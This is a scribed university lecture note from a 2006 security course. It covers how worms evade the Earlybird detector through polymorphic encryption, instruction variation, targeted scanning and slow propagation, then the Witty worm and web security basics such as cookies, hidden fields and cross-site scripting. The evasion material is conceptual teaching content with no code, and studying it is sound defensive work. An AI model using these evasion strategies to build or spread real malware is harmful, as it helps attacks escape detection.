CIS 551 /
TCOM 401
April 13,
2006
Lecture 23.
Polymorphic Viruses and Evasion Techniques, Web Security
Scribed by Taehyun Kim
▪ Plan for today
-
to wrap up discussion of viruses and worms
-
web security
▪ Earlybird
-
looks at the traffic
on large scale in the Internet.
-
looks for common,
invariant data in packets that occurs with high frequency and large dispersion
in the address. ¡æ this is the typical pattern that
most worms exhibit.
-
To avoid getting detected by Earlybird,
attackers can violate one of the three assumptions.
<Breaking 1st
assumption>
▪ Polymorphic
viruses/worms
-
make it hard to have invariant contents
-
mutate themselves
as they replicate so that they are less similar between offspring and parents.
-
Looking for frequently appearing substring is
not going to catch them.
-
should be done
globally.
-
also have to be
able to generate lots of random permutations. (Otherwise, they will still be
detected by Earlybird.)
▪ Strategy
-
Spam : using
different subject lines. - very simple.
-
The virus, as it¡¯s replicating, generates keys
randomly and encrypts the contents. : Virus somehow decrypts main body of the
code using a random key and jumps to the code it decrypted. When the virus
creates a new instance of itself, it generates a random key, encrypts most of
the virus with this random key, and then copies that encrypted version + bootstrapping
part of the virus that has the key embedded in it. Virus has to have the bootstrapping
part that access to the key and decrypts the rest, but the decryption part of
the code is going to be invariant across instances of the viruses.
-
Project 1 buffer overflow :
we have a lot of latitude over what assembly code instructions we put in the beginning.
It makes it easier to put NOPs, but by doing just a
little bit work we can make the code look different for every instance.
- There are lots
of ways you can generate instructions that have the affect of the NOP.
- Reordering
independent instructions.
- Using different
register names.
- Using equivalent instruction
sequences.
-
Suppose that it¡¯s somehow able to infect a program
that communicates using a secure channel. The worm will be encrypted
automatically as a part of the natural behavior of the machine, so it¡¯s not
going to be filtered.
<Breaking 2nd
assumption>
▪ Worms don¡¯t have to
scan randomly
-
You need some way of getting to access to a list
of good machines. Suppose you want to get virus or worm that would target
particular kind of web servers. The best way to spread your worm will be to
directly contact to whole bunch of web servers that are running a particular
version of fetch. ¡æ Google ( powered by php / supported by fetch version¡¦)
-
You can make meta-server worm which uses the
facilities of the internet itself to figure out where other vulnerable machines
might be.
-
Also make use of topological information. If you
infect a local machine running on the network and you have full controller on
that machine, you can listen to the protocol to find out the names of other
machines nearby. You don¡¯t have to generate your attack addresses randomly. You
can just do topological search of the space to look for particular vulnerable
software. ¡æ Email viruses need to know the names of valid addresses and it¡¯ll
be pretty hard to just guess randomly. Instead, they can walk through address
books.
<Breaking 3rd
assumption>
▪ Propagate slowly
-
This is sort of counter intuitive. Most analyses
focus on how quickly worms maliciously take over some fraction of the
vulnerable machines. However, it might be more destructive in a long run, if
you take very slow approach to infect machines. It¡¯s very careful not to set
off any kind of intrusion detection systems that are looking for unusual
frequency behavior. By slowly and subtly changing a bunch of small things over
time you can corrupt a lot of data before things are noticeable.
▪ Witty Worm
-
It was trying to spread quickly.
-
used one of the
UDP single packet attacks.
-
It was limited only by bandwidth, so it didn¡¯t
need to worry about the round-trip time on the Internet.
-
Payload was supposed to slowly and randomly
corrupt disk blocks over time.
-
Flaw had been announced the previous day. This
means that some hacker was able to figure out the appropriate buffer overflow,
construct the single packet attack in one day and generate this worm.
-
UCSD telescope picked it up.
▪ Web Security
Q : What are the things you
worry about when using web applications?
A : Class answers
-
Links can lie in multiple ways – may not take
you where you think they do.
-
More malicious users (authentication is a
problem)
-
Cookies can reveal private information and questions
of security.
-
Spyware / Malware : mobile code problem (Java applets and so on)
-
Eavesdropping / keylogger
-
Knowing what¡¯s going on :
configuration management – not so much web security thing.
-
Embedded code / scripts / flash / ActiveX / ¡¦
executable contents
-
Authorization, etc. : access control
-
Profile stealing
-
Trusting remote sites with your confidential
information
▪ Open web application
security project
:
looked at a large number of web applications to see what the biggest problems
are.
-
invalidated input,
buffer overflows, injection flaws, cross site scripting, etc.
-
A lot of web developers (typically web
designers) have no actual experience with thinking about security.
-
Inappropriate error handling :
revealing too much information by the data you send back.
-
Insecure storage
▪ HTTP
:
a protocol on which web is built.
-
Stateless : the server
actually doesn¡¯t keep any connection state about what clients have contacted in
the past. It¡¯s very hard to do things like having session at Amazon that keeps
track of what you have in your shopping cart. However, stateless protocols are
much more scalable. ¡æ trade-off
▪ HTTP body
-
Connection information :
modern versions of HTTP allow you to reuse the same TCP connection for multiple
requests and responses with the server. HTTP is self-extinguished, but the
server would still maintain the TCP connection for client. (In the original
version, if a client downloads a web page containing 20 pictures, every picture
requires another TCP handshake)
-
Cookie information :
Whenever you contact to a server, your web browser automatically uploads the
cookies which are previously left on your machine.
-
Client information :
What kind of web browser¡¯s running, what kind of operating system is running.
You can just snoop some HTTP traffic and find out that
people on a certain machine are running a certain version of Internet Explorer.
-
Preference for data it gets back.
▪ First issue of
security
:
URL (which are used to identify the contents, servers and clients.)
-
A lot of server security issues that come up in
the web arise because URLs are complicated.
-
You can embed lots of contents in the URIs itself. Because HTTP is stateless, one of tricks you
can do is store state in the URLs. You actually can see really complicated
string of parameters when you go to a web page.
-
In terms of security, there are a lot of
possibilities for misusing URLs. Most common thing is to change the URLs.
(Ex:whitehouse.org, whitehouse.com)
-
Also, you can make the URLs unreadable
: use IP addresses instead of domain names, embed the characters as
Unicode instead of actual ASCII syntax.
▪ Second Issue
:
Stateless
-
Embed state in the URL.
-
Hidden Input fields :
You can add these into the web pages, and then your client will post that information
back to the server. The server can save information across requests by giving
you back a web page that has hidden input fields. It sets a hidden text box
with some string it want to remember, and next time when you click on some
link, it posts that back to the server. So, the server can remember the state
across actions of the client by hiding information in hidden input fields. You
can detect this easily by just looking at the source code of the web page you
get back.
-
Cookies : These store
data on the client machine.
▪ Cookies
-
Whenever the server wants to store something on
the client, it just sends back the reply that has set cookie line as part of
the header. (the name of the cookie = some value) These are strings that are
remembered by the web browsers.
-
server can specify
a path and a domain. Cookies can be associated with particular domain names and
particular paths within a domain. Those restrict when the cookies will be sent
back to the server.
-
Setting a flag called ¡®secure¡¯ lets only the client
upload the cookies.
-
Whenever the client requests the URL to the
server, the browser looks through the cookie cache to see if any of the cookies
that you have match the URL in domain name and path specified in the cookies.
If so, it adds one of those cookie lines to the request message.
-
New instances of cookies overwrite old ones.
This can be used by cross site scripting attacks.
-
Clients aren¡¯t required to purge the cookies
whenever they are expired.
-
At most 4Kbytes long to prevent malicious
servers from overloading the clients with too much cookie data.
-
HTTP proxy server shouldn¡¯t cache any of the set
cookie headers because the state can be replayable.
▪ Cross site scripting
-
Web browsers don¡¯t just display HTML. They also run
code. On the client side, you can have embedded scripts that get executed by
the browser locally. Server also typically runs executable contents because we
want dynamically generated web pages with new information.
-
CGI : allows the
server to run arbitrary code written any programming language. (typically
written C and Perl )
-
PHP : like preprocessor for HTML
▪ How
cross site scripting works
-
Suppose you try to access ¡®foo.html¡¯ which
doesn¡¯t exist. Then the server will give you back a web page with error message
¡®not found¡¯. URL has this ¡®foo.html¡¯, and the ¡®foo.html¡¯ somehow has to show up
inside this web page as text. That means that the server, when it gets this
error message, copies some piece of URL into the HTML. Instead of foo.html, we
can embed some java script. If the server just copies this string into the HTML
page, Java script which got embedded into the error message by the server would
run on the machine. However, this sort of attack is becoming well-known, so
some modern servers won¡¯t just naively copy the URL.